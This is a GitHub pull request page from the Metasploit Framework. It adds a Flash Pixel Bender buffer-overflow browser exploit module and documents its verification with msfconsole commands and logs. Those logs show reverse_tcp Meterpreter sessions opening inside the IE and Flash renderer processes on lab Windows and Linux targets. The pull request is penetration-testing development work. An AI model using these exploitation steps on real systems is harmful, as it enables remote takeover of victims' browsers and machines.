Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

adobe_flash_pixel_bender_bof: Execution from the flash renderer / Linux & Windows 8.1 support. #5524

Merged
merged 2 commits into from Jun 15, 2015
Merged

adobe_flash_pixel_bender_bof: Execution from the flash renderer / Linux & Windows 8.1 support. #5524

merged 2 commits into from Jun 15, 2015

Conversation

jvazquez-r7
Copy link
Contributor

This PR adds modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb using the flash exploitation code, allowing native payload execution from the flash renderer process. It also adds supports for:

  • Firefox (32 bits) / Adobe Flash plug-in on Windows 7 SP1.
  • Firefox (32 bits) / Adobe Flash plug-in on Windows 8.1
  • Linux Mint (32 bits) / Firefox (32 bits) / Adobe Flash plug-in.

So the old modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb is deprecated.

Verification

  • Install a Windows 7 target: Windows 7 SP1 32 bits / IE 11 / Firefox 38.0.5 / Adobe Flash 13.0.0.182 (ActiveX) and Flash 11.7.700.275 (plugin)
  • Install a Windows 8.1 target: Windows 8 SP1 (32 bits or 64 bits), Firefox 38.0.5 (32 bits) and Flash 13.0.0.182 (Plug-in)
  • Install a Linux target: Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash Plug-in 11.2.202.350
  • Run msfconsole and use the module modules/exploits/windows/browser/adobe_flash_pixel_bender_bof
  • Run the module with the windows target and the windows/meterpreter/reverse_tcp payload
msf > use exploit/multi/browser/adobe_flash_pixel_bender_bof
msf exploit(adobe_flash_pixel_bender_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_pixel_bender_bof) > set target 0
target => 0
msf exploit(adobe_flash_pixel_bender_bof) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(adobe_flash_pixel_bender_bof) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(adobe_flash_pixel_bender_bof) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
  • Visit the page from Windows 7 SP1 / IE 11 / Adobe Flash 13.0.0.182 (ActiveX), verify which you get a session and it lives inside the IE renderer process:
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Gathering target information.
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Sending HTML response.
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Request: /DXH2DnDPzGN5O/vkuPZR/
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Sending HTML...
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Request: /DXH2DnDPzGN5O/vkuPZR/pFdIB.swf
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.131
[*] Meterpreter session 4 opened (172.16.158.1:4444 -> 172.16.158.131:54400) at 2015-06-11 17:37:24 -0500

msf exploit(adobe_flash_pixel_bender_bof) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > getpid
pCurrent pid: 2816
meterpreter > ps -S 2816


Process list
============

 PID   Name                                Arch  Session  User                          Path
 ---   ----                                ----  -------  ----                          ----
 2816  iexplore.exe                        x86   1        WIN-RNJ7NBRK9L7\Juan Vazquez  C:\Program Files\Internet Explorer\iexplore.exe


meterpreter >
  • Visit the page from Windows 7 SP1 / Firefox / Adobe Flash 11_7_700_275 (plugin), verify which you get a session and it lives inside the Flash renderer process:
msf exploit(adobe_flash_pixel_bender_bof) > [*] Using URL: http://172.16.158.1:8080/DXH2DnDPzGN5O
[*] Server started.
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Gathering target information.
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Sending HTML response.
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Request: /DXH2DnDPzGN5O/vkuPZR/
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Sending HTML...
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Request: /DXH2DnDPzGN5O/vkuPZR/VslP.swf
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.131
[*] Meterpreter session 3 opened (172.16.158.1:4444 -> 172.16.158.131:54386) at 2015-06-11 17:35:51 -0500

msf exploit(adobe_flash_pixel_bender_bof) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getpid
Current pid: 5100
meterpreter > ps -S 5100


Process list
============

 PID   Name                                Arch  Session  User                          Path
 ---   ----                                ----  -------  ----                          ----
 5100  FlashPlayerPlugin_11_7_700_275.exe  x86   1        WIN-RNJ7NBRK9L7\Juan Vazquez  C:\Windows\system32\Macromed\Flash\FlashPlayerPlugin_11_7_700_275.exe


meterpreter >
  • Visit the page from Window 8.1 / Firefox 38.0.5 / Adobe Flash 13.0.0.182 (Plugin), verify which you get a session and it lives inside the Flash renderer process:
msf exploit(adobe_flash_pixel_bender_bof) > [*] Using URL: http://172.16.158.1:8080/RgaeiMH
[*] Server started.
[*] 172.16.158.134   adobe_flash_pixel_bender_bof - Gathering target information.
[*] 172.16.158.134   adobe_flash_pixel_bender_bof - Sending HTML response.
[*] 172.16.158.134   adobe_flash_pixel_bender_bof - Request: /RgaeiMH/vkuPZR/
[*] 172.16.158.134   adobe_flash_pixel_bender_bof - Sending HTML...
[*] 172.16.158.134   adobe_flash_pixel_bender_bof - Request: /RgaeiMH/vkuPZR/oSXcJX.swf
[*] 172.16.158.134   adobe_flash_pixel_bender_bof - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.134
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.134:51768) at 2015-06-11 17:27:23 -0500

msf exploit(adobe_flash_pixel_bender_bof) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN-U7MBH836GNO
OS              : Windows 8.1 (Build 9600).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getpid
Current pid: 2004
meterpreter > ps -S 2004


Process list
============

 PID   Name                              Arch  Session  User                  Path
 ---   ----                              ----  -------  ----                  ----
 2004  FlashPlayerPlugin_13_0_0_182.exe  x86   1        WIN-U7MBH836GNO\juan  C:\Windows\system32\Macromed\Flash\FlashPlayerPlugin_13_0_0_182.exe


meterpreter >
  • Run the module with the linux target and the linux/x86/meterpreter/reverse_tcp payload
msf > use exploit/multi/browser/adobe_flash_pixel_bender_bof
msf exploit(adobe_flash_pixel_bender_bof) > set target 1
target => 1
msf exploit(adobe_flash_pixel_bender_bof) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(adobe_flash_pixel_bender_bof) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(adobe_flash_pixel_bender_bof) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(adobe_flash_pixel_bender_bof) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
  • Vist the page from the linux target, verify which you get a session and it lives inside the Flash renderer process
msf exploit(adobe_flash_pixel_bender_bof) > [*] Using URL: http://172.16.158.1:8080/0jz9hTBKhcQ
[*] Server started.
[*] 172.16.158.133   adobe_flash_pixel_bender_bof - Gathering target information.
[*] 172.16.158.133   adobe_flash_pixel_bender_bof - Sending HTML response.
[*] 172.16.158.133   adobe_flash_pixel_bender_bof - Request: /0jz9hTBKhcQ/vkuPZR/
[*] 172.16.158.133   adobe_flash_pixel_bender_bof - Sending HTML...
[*] 172.16.158.133   adobe_flash_pixel_bender_bof - Request: /0jz9hTBKhcQ/vkuPZR/oxSXP.swf
[*] 172.16.158.133   adobe_flash_pixel_bender_bof - Sending SWF...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495598 bytes) to 172.16.158.133
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.133:58859) at 2015-06-11 17:31:34 -0500

msf exploit(adobe_flash_pixel_bender_bof) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : flash
OS           : Linux flash 3.13.0-37-generic #64-Ubuntu SMP Mon Sep 22 21:30:01 UTC 2014 (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter > getpid
Current pid: 16404
meterpreter > ps -S 16404


Process list
============

 PID    Name                         Arch  Session  User        Path
 ---    ----                         ----  -------  ----        ----
 16404  plugin-containe              x86   0        juan        �ELF


meterpreter >

@wchen-r7 wchen-r7 self-assigned this Jun 12, 2015
@wchen-r7 wchen-r7 merged commit 72672fc into rapid7:master Jun 15, 2015
wchen-r7 added a commit that referenced this pull request Jun 15, 2015
@wchen-r7
Land #5524, adobe_flash_pixel_bender_bof in flash renderer
17b8ddc
todb-r7 pushed a commit to todb-r7/metasploit-framework that referenced this pull request Jun 18, 2015
Minor description fixups.
afcb016 
Edited modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb
first landed in rapid7#5524, adobe_flash_pixel_bender_bof in flash renderer .
Removed ASCII bullets since those rarely render correctly.

Edited modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb
first landed in rapid7#5252, @espreto's module for WordPress Front-end Editor
File Upload Vuln . Fixed up some language usage, camel-cased "WordPress."
@todb-r7 todb-r7 mentioned this pull request Jun 18, 2015
Merged
1 task
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wchen-r7 wchen-r7

Labels
enhancement module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@jvazquez-r7 @wchen-r7